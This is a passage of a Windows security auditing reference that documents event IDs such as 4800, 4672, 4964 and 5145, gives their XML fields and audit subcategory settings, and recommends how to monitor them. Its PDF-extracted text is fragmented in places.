should not be made from certain accounts or addresses. which connections should not be made from certain accounts
or addresses, monitor this event for the corresponding Client
Name or Client Address.
If Fast User Switching is disabled on workstations or specific computers, then monitor for any event with
Session Name = Console.
If Remote Desktop Connections are not allowed for specific users (Subject\Account Name) or disabled on
some computers, then monitor for Session Name = RDP -Tcp# (substring).
To ensure that connections are made only from your internal IP address list, monitor the Additional
Information\Client Address in this event.
4800(S): The workstation was locked.
Applies to
Windows 10
Windows Server 2016
Events
Event Description:
This event is generated when a workstation
was locked.

Event XML:
- <System>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SessionId">3</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “lock workstation” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “lock workstation”
operation.
the following:
Session ID [Type = UInt32]: unique ID of locked session. You can see the list of current session IDs using
“query session” command in command prompt. Example of output (see ID column):

For 4800(S ): The workstation was locked.
Typically this is an informational event, and can give you information about when a machine was locked, and
which account was used to lock it.
4801(S): The workstation was unlocked.
Applies to
Windows 10
Windows Server 2016
Events
Event Description:
This event is generated when workstation was
unlocked.

Event XML:
- <System>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “unlock workstation” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “unlock workstation”
operation.
the following:
Session ID [Type = UInt32]: unique ID of unlocked session. You can see the list of current session IDs using
“query session” command in command prompt. Example of output (see ID column):

For 4801(S ): The workstation was unlocked.
Typically this is an informational event, and can give you information about when a machine was unlocked, and
which account was used to unlock it.
4802(S): The screen saver was invoked.
Applies to
Windows 10
Windows Server 2016
Events
Event Description:
This event is generated when screen saver was
invoked.

Event XML:
- <System>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “invoke screensaver” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “invoke screensaver”
operation.
the following:
Session ID [Type = UInt32]: unique ID of a session for which screen saver was invoked. You can see the list
of current session IDs using “query session” command in command prompt. Example of output (see ID
column):

For 4802(S ): The screen saver was invoked.
Typically this is an informational event, and can give you information about when a screen saver was invoked on
a machine, and which account invoked it.
4803(S): The screen saver was dismissed.
Applies to
Windows 10
Windows Server 2016
Events
Event Description:
This event is generated when screen saver was
dismissed.

Event XML:
- <System>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “dismiss screensaver” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “dismiss screensaver”
operation.
the following:
Session ID [Type = UInt32]: unique ID of a session for which screen saver was dismissed. You can see the
list of current session IDs using “query session” command in command prompt. Example of output (see ID
column):

For 4803(S ): The screen saver was dismissed.
Typically this is an informational event, and can give you information about when a screen saver was dismissed
on a machine, and which account dismissed it.
5378(F): The requested credentials delegation was
disallowed by policy.
Applies to
Windows 10
Windows Server 2016
Events
Event Description:
This event generates requested CredSSP
credentials delegation was disallowed by
CredSSP delegation policy.
It typically occurs when CredSSP delegation
for WinRM double-hop session was not set
properly.

Event XML:
- <System>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0x2b1e04</Data>
<Data Name="Package">CREDSSP</Data>
<Data Name="UserUPN">dadmin@contoso</Data>
<Data Name="TargetServer">WSMAN/dc01.contoso.local</Data>
<Data Name="CredType">%%8098</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested credentials delegation. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that requested credentials delegation.
the following:
Credential Delegation Information:
Security Package [Type = UnicodeString]: the name of Security Package which was used. Always
CREDSSP for this event.
User's UPN [Type = UnicodeString]: UPN of the account for which delegation was requested.
Target Server [Type = UnicodeString]: SPN of the target service for which delegation was requested.
Credential Type [Type = UnicodeString]: types of credentials which were presented for delegation:
CREDENTIALS TYPE DESCRIPTION
Default credentials The credentials obtained when the user first logs on to
Windows.
Fresh credentials The credentials that the user is prompted for when executing
an application.
Saved credentials The credentials that are saved using Credential Manager.

For 5378(F ): The requested credentials delegation was disallowed by policy.
If you have defined CredSSP delegation policy, then this event will show you policy violations. We
recommend collecting these events and investigating every policy violation.
This event also can be used for CredSSP delegation troubleshooting.
5632(S, F): A request was made to authenticate to a
wireless network.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
This event generates when 802.1x authentication
attempt was made for wireless network.
It typically generates when network adapter
connects to new wireless network.

Event XML:
- <System>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Correlation />
<Computer>XXXXXXX.redmond.corp.microsoft.com</Computer>
<Security />
</System>
- <EventData>
<Data Name="SSID">Nokia</Data>
<Data Name="Identity">host/XXXXXXXX.redmond.corp.microsoft.com</Data>
<Data Name="PeerMac">18:64:72:F3:33:91</Data>
<Data Name="LocalMac">02:1A:C5:14:59:C9</Data>
<Data Name="IntfGuid">{2BB33827-6BB6-48DB-8DE6-DB9E0B9F9C9B}</Data>
<Data Name="ReasonCode">0x0</Data>
<Data Name="ReasonText">The operation was successful.</Data>
<Data Name="ErrorCode">0x0</Data>
<Data Name="EAPReasonCode">0x0</Data>
<Data Name="EapRootCauseString" />
<Data Name="EAPErrorCode">0x0</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = UnicodeString]: User Principal Name (UPN ) or another type of account identifier for
which 802.1x authentication request was made.
Note User principal name (UPN ) format is used to specify an Internet-style name, such as
UserName@Example.Microsoft.com.
Account Name [Type = UnicodeString]: the name of the account for which 802.1x authentication request
was made.
the following:
Name (SSID ) [Type = UnicodeString]: SSID of the wireless network to which authentication request was sent.
Note A service set identifier (SSID ) is a sequence of characters that uniquely names a wireless local area
network (WLAN ). An SSID is sometimes referred to as a "network name." This name allows stations to connect
to the desired network when multiple independent networks operate in the same physical area.
Interface GUID [Type = GUID ]: GUID of the network interface which was used for authentication request.
You can see interface’s GUID using the following commands:

“netsh lan show interfaces” – for wired interfaces.
“netsh wlan show interfaces” – for wireless interfaces.
Local MAC Address [Type = UnicodeString]: local interface’s MAC -address.

Peer MAC Address [Type = UnicodeString]: peer’s (typically – access point) MAC -address.
Reason Code [Type = UnicodeString]: contains Reason Text (explanation of Reason Code) and Reason
Code for wireless authentication results. See more information about reason codes for wireless
authentication here: https://msdn.microsoft.com/library/windows/desktop/dd877212(v=vs.85).aspx,
https://technet.microsoft.com/library/cc727747(v=ws.10).aspx.
Error Code [Type = HexInt32]: there is no information about this field in this document.
EAP Reason Code [Type = HexInt32]: there is no information about this field in this document. See
additional information here: https://technet.microsoft.com/library/dd197570(v=ws.10).aspx.
EAP Root Cause String [Type = UnicodeString]: there is no information about this field in this document.
EAP Error Code [Type = HexInt32]: there is no information about this field in this document.

For 5632(S, F ): A request was made to authenticate to a wireless network.
5633(S, F): A request was made to authenticate to a
wired network.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other
Logon/Logoff Events
Event Description:
This event generates when 802.1x
authentication attempt was made
for wired network.
It typically generates when network
adapter connects to new wired
network.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="InterfaceName">Microsoft Hyper-V Network Adapter</Data>
<Data Name="Identity">-</Data>
<Data Name="ReasonCode">0x70003</Data>
<Data Name="ReasonText">The network does not support authentication</Data>
<Data Name="ErrorCode">0x0</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = UnicodeString]: User Principal Name (UPN ) of account for which 802.1x authentication
request was made.
Note User principal name (UPN ) format is used to specify an Internet-style name, such as
UserName@Example.Microsoft.com.
Account Name [Type = UnicodeString]: the name of the account for which 802.1x authentication request
was made.
the following:
Interface:
Name [Type = UnicodeString]: the name (description) of network interface which was used for authentication
request. You can get the list of all available network adapters using “ipconfig /all” command. See “Description”
row for every network adapter:
Reason Code [Type = UnicodeString]: contains Reason Text (explanation of Reason Code) and Reason Code
for wired authentication results. See more information about reason codes for wired authentication here:
https://msdn.microsoft.com/library/windows/desktop/dd877212(v=vs.85).aspx,
https://technet.microsoft.com/library/cc727747(v=ws.10).aspx.
Error Code [Type = HexInt32]: unique EAP error code.

For 5633(S, F ): A request was made to authenticate to a wired network.
Audit Special Logon
Applies to
Windows 10
Windows Server 2016
Audit Special Logon determines whether the operating system generates audit events under special sign on (or
log on) circumstances.
This subcategory allows you to audit events generated by special logons such as the following:
The use of a special logon, which is a logon that has administrator-equivalent privileges and can be used to
elevate a process to a higher level.
A logon by a member of a Special Group. Special Groups enable you to audit events generated when a
member of a certain group has logged on to your network. You can configure a list of group security
identifiers (SIDs) in the registry. If any of those SIDs are added to a token during logon and the
subcategory is enabled, an event is logged.
Event volume:
Medium on a domain controllers or network servers.
STRONGER STRONGER
Domain Yes No Yes No This subcategory

Controller is very important
because of
Special Groups
related events,
you must enable
this subcategory
for Success audit
if you use this
feature.
At the same time
this subcategory
allows you to
track account
logon sessions to
which sensitive
privileges were
assigned.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server Yes No Yes No This subcategory

is very important
because of
Special Groups
related events,
you must enable
this subcategory
for Success audit
if you use this
feature.
At the same time
this subcategory
allows you to
track account
logon sessions to
which sensitive
privileges were
assigned.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Workstation Yes No Yes No This subcategory

is very important
because of
Special Groups
related events,
you must enable
this subcategory
for Success audit
if you use this
feature.
At the same time
this subcategory
allows you to
track account
logon sessions to
which sensitive
privileges were
assigned.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4964(S ): Special groups have been assigned to a new logon.
4672(S ): Special privileges assigned to new logon.
4964(S): Special groups have been assigned to a new
logon.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Special Logon
Event Description:
This event occurs when an account that is a
member of any defined Special Group logs in.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>12548</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0xd972e</Data>
<Data Name="TargetUserName">ladmin</Data>
<Data Name="TargetLogonId">0x139faf</Data>
<Data Name="TargetLogonGuid">{B03B6192-09AE-E77F-DD10-2DC430766040}</Data>
<Data Name="SidList">%{S-1-5-21-3457937927-2839227994-823803824-512}</Data>
</EventData>
</Event>

Event Versions: 0.
Note Special Groups is a new feature in Windows Vista and in Windows Server 2008. The Special Groups
feature lets the administrator find out when a member of a certain group logs on to the computer. The Special
Groups feature lets an administrator set a list of group security identifiers (SIDs) in the registry.
> To add Special Groups perform the following actions:

> 1. Open Registry Editor.
> 2. Locate and then click the following registry subkey:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Audit
> 3. On the Edit menu, point to New, and then click String Value.
> 4. Type SpecialGroups, and then press ENTER.
> 5. Right-click SpecialGroups, and then click Modify.
> 6. In the Value date box, type the group SIDs, and then click OK.
> A semicolon character (;) can be used to delimit the SID list. For example, you can use the following string that
contains a semicolon to delimit two SIDs:
> S -1-5-32-544;S -1-5-32-123-54-65
> For more information see: http://blogs.technet.com/b/askds/archive/2008/03/11/special-groups-auditing-via-
group-policy-preferences.aspx
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested logon for New Logon account. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested logon for New Logon
account.
the following:
controller.
that can contain the same Logon GUID, “4648(S ): A logon was attempted using explicit credentials” and
“4624(S ): An account was successfully logged on.”
0000-000000000000}”.
New Logon:
Security ID [Type = SID ]: SID of account that performed the logon. Event Viewer automatically tries to
event.
Account Name [Type = UnicodeString]: the name of the account that performed the logon.
the following:
controller.
that can contain the same Logon GUID, “4648(S ): A logon was attempted using explicit credentials” and
“4624(S ): An account was successfully logged on.”
0000-000000000000}”.
Special Groups Assigned [Type = UnicodeString]: the list of special group SIDs, which New
Logon\Security ID is a member of.

For 4964(S ): Special groups have been assigned to a new logon.
Generally speaking, every 4964 event should be monitored, because the purpose of Special Groups is to
define a list of critical or important groups (Domain Admins, Enterprise Admins, service account groups, and
so on) and trigger an event every time a member of these groups logs on to a computer. For example, you can
monitor for every Domain Administrators logon to a non-administrative workstation.
4672(S): Special privileges assigned to new logon.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Special Logon

Event Description:
This event generates for new account logons
if any of the following sensitive privileges are
assigned to the new logon session:
SeTcbPrivilege - Act as part of the
operating system
SeBackupPrivilege - Back up files and
directories
SeCreateTokenPrivilege - Create a token
object
SeDebugPrivilege - Debug programs
SeEnableDelegationPrivilege - Enable
computer and user accounts to be trusted
for delegation
SeAuditPrivilege - Generate security audits
SeImpersonatePrivilege - Impersonate a client after authentication
SeLoadDriverPrivilege - Load and unload device drivers
SeSecurityPrivilege - Manage auditing and security log
SeSystemEnvironmentPrivilege - Modify firmware environment values
SeAssignPrimaryTokenPrivilege - Replace a process-level token
SeRestorePrivilege - Restore files and directories,
SeTakeOwnershipPrivilege - Take ownership of files or other objects
You typically will see many of these events in the event log, because every logon of SYSTEM (Local System)
account triggers this event.
Event XML:
- <System>
<Level>0</Level>
<Task>12548</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="PrivilegeList">SeTcbPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege
SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeEnableDelegationPrivilege
SeImpersonatePrivilege</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account to which special privileges were assigned. Event Viewer
Account Name [Type = UnicodeString]: the name of the account to which special privileges were
assigned.
the following:
Privileges [Type = UnicodeString]: the list of sensitive privileges, assigned to the new logon. The following table
contains the list of possible privileges for this event:
SeAssignPrimaryTokenPrivilege Replace a process-level token Required to assign the primary token

of a process.

operations.
request other than read is still
evaluated with the ACL. The following
access rights are granted if this privilege
is held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE

creation APIs.

memory of a process owned by
another account.
With this privilege, the user can attach
a debugger to any process or to the
kernel. We recommend that
SeDebugPrivilege always be granted to
Administrators, and only to
Administrators. Developers who are
debugging their own applications do
not need this user right. Developers
who are debugging new system
components need this user right. This
user right provides complete access to
sensitive and critical operating system
components.
driver.

held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
an object.

security event log.
SeSystemEnvironmentPrivilege Modify firmware environment values Required to modify the nonvolatile

RAM of systems that use this type of
information.
value to be set only to those values
that the holder may legitimately assign
as the owner of an object.
ownership of any securable object in
the system, including Active Directory
SeTcbPrivilege Act as part of the operating system This privilege identifies its holder as
part of the trusted computer base.

For 4672(S ): Special privileges assigned to new logon.
Monitor for this event where “Subject\Security ID” is not one of these well-known security principals:
LOCAL SYSTEM, NETWORK SERVICE, LOCAL SERVICE, and where “Subject\Security ID” is not an
administrative account that is expected to have the listed Privileges.
If you have a list of specific privileges which should never be granted, or granted only to a few accounts (for
example, SeDebugPrivilege), use this event to monitor for those “Privileges.”
If you are required to monitor any of the sensitive privileges in the Event Description for this event, search for
those specific privileges in the event.
Applies to
Windows 10
Windows Server 2016
Audit Application Generated generates events for actions related to Authorization Manager applications.
Audit Application Generated subcategory is out of scope of this document, because Authorization Manager is very
rarely in use and it is deprecated starting from Windows Server 2012.
STRONGER STRONGER
Domain IF IF IF IF IF – if you use

Controller Authorization
Manager in your
environment and
you need to
monitor events
related to
Authorization
Manager
applications,
enable this
subcategory.
Member Server IF IF IF IF IF – if you use

Authorization
Manager in your
environment and
you need to
monitor events
related to
Authorization
Manager
applications,
enable this
subcategory.
Workstation IF IF IF IF IF – if you use

Authorization
Manager in your
environment and
you need to
monitor events
related to
Authorization
Manager
applications,
enable this
subcategory.
Events List:
4665: An attempt was made to create an application client context.
4666: An application attempted an operation.
4667: An application client context was deleted.
4668: An application was initialized.
Applies to
Windows 10
Windows Server 2016
Audit Certification Services determines whether the operating system generates events when Active Directory
Certificate Services (AD CS ) operations are performed.
Examples of AD CS operations include:
AD CS starts, shuts down, is backed up, or is restored.
Certificate revocation list (CRL )-related tasks are performed.
Certificates are requested, issued, or revoked.
Certificate manager settings for AD CS are changed.
The configuration and properties of the certification authority (CA) are changed.
AD CS templates are modified.
Certificates are imported.
A CA certificate is published to Active Directory Domain Services.
Security permissions for AD CS role services are modified.
Keys are archived, imported, or retrieved.
The OCSP Responder Service is started or stopped.
Monitoring these operational events is important to ensure that AD CS role services are functioning properly.
Event volume: Low to medium on servers that provide AD CS role services.
Role-specific subcategories are outside the scope of this document.
STRONGER STRONGER
Domain IF IF IF IF IF – if a server
Controller has the Active
Directory
Certificate
Services (AD CS)
role installed and
you need to
monitor AD CS
related events,
enable this
subcategory.
STRONGER STRONGER
Member Server IF IF IF IF IF – if a server

has the Active
Directory
Certificate
Services (AD CS)
role installed and
you need to
monitor AD CS
related events,
enable this
subcategory.
Workstation No No No No Active Directory

Certificate
Services (AD CS)
role cannot be
installed on client
OS.
4868: The certificate manager denied a pending certificate request.

4869: Certificate Services received a resubmitted certificate request.
4870: Certificate Services revoked a certificate.
4871: Certificate Services received a request to publish the certificate
revocation list (CRL).
4872: Certificate Services published the certificate revocation list (CRL).
4873: A certificate request extension changed.
4874: One or more certificate request attributes changed.
4875: Certificate Services received a request to shut down.
4876: Certificate Services backup started.
4877: Certificate Services backup completed.
4878: Certificate Services restore started.
4879: Certificate Services restore completed.
4880: Certificate Services started.
4881: Certificate Services stopped.
4882: The security permissions for Certificate Services changed.
4883: Certificate Services retrieved an archived key.
4884: Certificate Services imported a certificate into its database.
4885: The audit filter for Certificate Services changed.
4886: Certificate Services received a certificate request.
4887: Certificate Services approved a certificate request and issued a
certificate.
4888: Certificate Services denied a certificate request.
4889: Certificate Services set the status of a certificate request to
pending.
4890: The certificate manager settings for Certificate Services changed.
4891: A configuration entry changed in Certificate Services.
4892: A property of Certificate Services changed.
4893: Certificate Services archived a key.
4894: Certificate Services imported and archived a key.
4895: Certificate Services published the CA certificate to Active
Directory Domain Services.
4896: One or more rows have been deleted from the certificate
database.
4897: Role separation enabled.
4898: Certificate Services loaded a template.
Applies to
Windows 10
Windows Server 2016
Audit Detailed File Share allows you to audit attempts to access files and folders on a shared folder.
The Detailed File Share setting logs an event every time a file or folder is accessed, whereas the File Share setting
only records one event for any connection established between a client and file share. Detailed File Share audit
events include detailed information about the permissions or other criteria used to grant or deny access.
There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all
shared files and folders on the system is audited.
Event volume:
High on file servers.
High on domain controllers because of SYSVOL network access required by Group Policy.
STRONGER STRONGER
Domain No Yes No Yes Audit Success for

Controller this subcategory
on domain
controllers
typically will lead
to very high
volume of events,
especially for
SYSVOL share.
We recommend
monitoring
Failure access
attempts: the
volume should
not be very high.
You will be able
to see who was
not able to get
access to a file or
folder on a
network share on
a computer.
STRONGER STRONGER
Member Server IF Yes IF Yes IF – If a server

has shared
network folders
which typically
get many access
requests (File
Server, for
example), the
volume of events
might be very
high. If you really
need to track all
successful access
events for every
file or folder
located on a
shared folder,
enable Success
auditing or use
the Audit File
System
subcategory,
although that
subcategory
excludes some
information in
Audit Detailed
File Share, for
example, the
client’s IP
address.
The volume of
Failure events for
member servers
should not be
very high (if they
are not File
Servers). With
Failure auditing,
you will be able
to see who was
not able to get
access to a file or
folder on a
network share on
this computer.
STRONGER STRONGER
Workstation IF Yes IF Yes IF – If a

workstation has
shared network
folders which
typically get
many access
requests, the
volume of events
might be very
high. If you really
need to track all
successful access
events for every
file or folder
located on a
shared folder,
enable Success
auditing or use
Audit File System
subcategory,
although that
subcategory
excludes some
information in
Audit Detailed
File Share, for
example, the
client’s IP
address.
The volume of
Failure events for
workstations
should not be
very high. With
Failure auditing,
you will be able
to see who was
not able to get
access to a file or
folder on a
network share on
this computer.
Events List:
5145(S, F ): A network share object was checked to see whether client can be granted desired access.
5145(S, F): A network share object was checked to see
whether client can be granted desired access.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit
Detailed File Share
Event Description:
This event generates every
time network share object
(file or folder) was
accessed.
Important: Failure events
are generated only when
access is denied at the file
share level. No events are
generated if access was
denied on the file system
(NTFS ) level.
Note For
Security Monitoring
Recommendations for
this event.
Event XML:
- <System>
<Level>0</Level>
<Task>12811</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0x38d34</Data>
<Data Name="ObjectType">File</Data>
<Data Name="IpAddress">fe80::31ea:6c3c:f40d:1973</Data>
<Data Name="ShareName">\\\\\*\\Documents</Data>
<Data Name="ShareLocalPath">\\??\\C:\\Documents</Data>
<Data Name="RelativeTargetName">Bginfo.exe</Data>
<Data Name="AccessList">%%1541 %%4416 %%4423</Data>
<Data Name="AccessReason">%%1541: %%1801 D:(A;;FA;;;WD) %%4416: %%1801 D:(A;;FA;;;WD) %%4423: %%1801 D:
(A;;FA;;;WD)</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested access to network share object. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested access to network share
object.
the following:
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation. Always
“File” for this event.
The following table contains the list of the most common Object Types:
DIRECTORY EVENT TIMER DEVICE
Mutant Type File Token
Thread Section WindowStation DebugObject
FilterCommunicationPort EventPair Driver IoCompletion
Controller SymbolicLink WmiGuid Process
Profile Desktop KeyedEvent Adapter
Key WaitablePort Callback Semaphore
Job Port FilterConnectionPort ALPC Port
Source Address [Type = UnicodeString]: source IP address from which access was performed.
Source Port [Type = UnicodeString]: source TCP or UDP port which was used from remote or local
machine to request the access.
0 for local access attempts.
Share Information:
Share Name [Type = UnicodeString]: the name of accessed network share. The format is:
\\*\SHARE_NAME.
Share Path [Type = UnicodeString]: the full system (NTFS ) path for accessed share. The format is: \\??
\PATH. Can be empty, for example for Share Name: \\*\IPC$.
Relative Target Name [Type = UnicodeString]: relative name of the accessed target file or folder. This file-
path is relative to the network share. If access was requested for the share itself, then this field appears as “\”.
Access Mask [Type = HexInt32]: the sum of hexadecimal values of requested access rights. See “Table 13.
File access codes.” for different hexadecimal values for access rights.
These access rights depend on Object Type.
Table of file access codes

HEX VALUE,
ACCESS SCHEMA VALUE DESCRIPTION
ReadData (or ListDirectory) 0x1, ReadData - For a file object, the right
%%4416 to read the corresponding file data. For
a directory object, the right to read the
corresponding directory data.
ListDirectory - For a directory, the
right to list the contents of the
directory.
WriteData (or AddFile) 0x2, WriteData - For a file object, the right
%%4417 to write data to the file. For a directory
object, the right to create a file in the
directory (FILE_ADD_FILE).
AddFile - For a directory, the right to
create a file in the directory.
AppendData (or AddSubdirectory or 0x4, AppendData - For a file object, the

CreatePipeInstance) %%4418 right to append data to the file. (For
local files, write operations will not
overwrite existing data if this flag is
specified without FILE_WRITE_DATA.)
For a directory object, the right to
create a subdirectory
(FILE_ADD_SUBDIRECTORY).
AddSubdirectory - For a directory, the
right to create a subdirectory.
CreatePipeInstance - For a named
pipe, the right to create a pipe.
ReadEA 0x8, The right to read extended file

%%4419 attributes.
WriteEA 0x10, The right to write extended file

%%4420 attributes.
Execute/Traverse 0x20, Execute - For a native code file, the

%%4421 right to execute the file. This access
right given to scripts may cause the
script to be executable, depending on
the script interpreter.
Traverse - For a directory, the right to
traverse the directory. By default, users
are assigned the
BYPASS_TRAVERSE_CHECKING
privilege, which ignores the
FILE_TRAVERSE access right. See the
remarks in File Security and Access
Rights for more information.
HEX VALUE,
DeleteChild 0x40, For a directory, the right to delete a

%%4422 directory and all the files it contains,
including read-only files.
ReadAttributes 0x80, The right to read file attributes.

%%4423
WriteAttributes 0x100, The right to write file attributes.

%%4424
DELETE 0x10000, The right to delete the object.

%%1537
READ_CONTROL 0x20000, The right to read the information in the

%%1538 object's security descriptor, not
including the information in the system
access control list (SACL).
WRITE_DAC 0x40000, The right to modify the discretionary

%%1539 access control list (DACL) in the object's
WRITE_OWNER 0x80000, The right to change the owner in the

%%1540 object's security descriptor
SYNCHRONIZE 0x100000, The right to use the object for

%%1541 synchronization. This enables a thread
state. Some object types do not
support this access right.
ACCESS_SYS_SEC 0x1000000, The ACCESS_SYS_SEC access right

%%1542 controls the ability to get or set the
SACL in an object's security descriptor.
Table 13. File access codes.
Access Check Results [Type = UnicodeString]: the list of access check results. The format of the result is:
REQUESTED_ACCESS: RESULT ACE_WHICH_ ALLOWED_OR_DENIED_ACCESS.

REQUESTED_ACCESS – the name of requested access. See Table of file access codes, earlier in this topic.
RESULT:
Granted by – if access was granted.
Denied by – if access was denied.
ACE_WHICH_ ALLOWED_OR_DENIED_ACCESS: the Security Descriptor Definition Language (SDDL )
value for Access Control Entry (ACE ), which granted or denied access.
Note The ** Security Descriptor Definition Language (SDDL )** defines string elements for enumerating
information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN )(D;;0xf0007;;;BG )(A;;0xf0007;;;SY )
(A;;0×7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD )
O: = Owner. SID of specific security principal, or reserved (pre-defined) value, for example: BA
(BUILTIN_ADMINISTRATORS ), WD (Everyone), SY (LOCAL_SYSTEM ), etc. See the list of possible values
in the table below.
SDDL values for Access Control Entry

VALUE DESCRIPTION VALUE DESCRIPTION
"AO" Account operators "PA" Group Policy administrators
"RU" Alias to allow previous "IU" Interactively logged-on user

Windows 2000
"AN" Anonymous logon "LA" Local administrator
"AU" Authenticated users "LG" Local guest
"BA" Built-in administrators "LS" Local service account
"BG" Built-in guests "SY" Local system
"BO" Backup operators "NU" Network logon user
"BU" Built-in users "NO" Network configuration

operators
"CA" Certificate server "NS" Network service account

administrators
"CG" Creator group "PO" Printer operators
"CO" Creator owner "PS" Personal self
"DA" Domain administrators "PU" Power users
"DC" Domain computers "RS" RAS servers group
"DD" Domain controllers "RD" Terminal server users
"DG" Domain guests "RE" Replicator
"DU" Domain users "RC" Restricted code
"EA" Enterprise administrators "SA" Schema administrators
"ED" Enterprise domain "SO" Server operators

controllers
"WD" Everyone "SU" Service logon user
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD )
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
"P” - SDDL_PROTECTED, Inheritance from containers that are higher in the folder hierarchy are blocked.
"AI" - SDDL_AUTO_INHERITED, Inheritance is allowed, assuming that "P" Is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ, Child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: Child objects that are containers, such as directories, inherit the ACE as an explicit
ACE.
"OI" - OBJECT INHERIT: Child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ace.
"IO" - INHERITANCE ONLY: ace doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: A hexadecimal string which denotes the access mask or reserved value, for example: FA (File All Access),
FX (File Execute), FW (File Write), etc.
Generic access rights Directory service access

rights
"GA" GENERIC ALL "RC" Read Permissions
"GR" GENERIC READ "SD" Delete
"GW" GENERIC WRITE "WD" Modify Permissions
"GX" GENERIC EXECUTE "WO" Modify Owner
File access rights "RP" Read All Properties
"FA" FILE ALL ACCESS "WP" Write All Properties
"FR" FILE GENERIC READ "CC" Create All Child Objects
"FW" FILE GENERIC WRITE "DC" Delete All Child Objects
"FX" FILE GENERIC EXECUTE "LC" List Contents
Registry key access rights "SW" All Validated Writes
"KA" "LO" "LO" List Object
"K" KEY READ "DT" Delete Subtree
"KW" KEY WRITE "CR" All Extended Rights
"KX" KEY EXECUTE
object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD (Everyone),
SY (LOCAL_SYSTEM ), etc. See the table above for more details.
For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.

For 5145(S, F ): A network share object was checked to see whether client can be granted desired access.
Monitor this event if the Network Information\Source Address is not from your internal IP range.
Monitor this event if the Network Information\Source Address should not be able to connect with the
specific computer (Computer:).
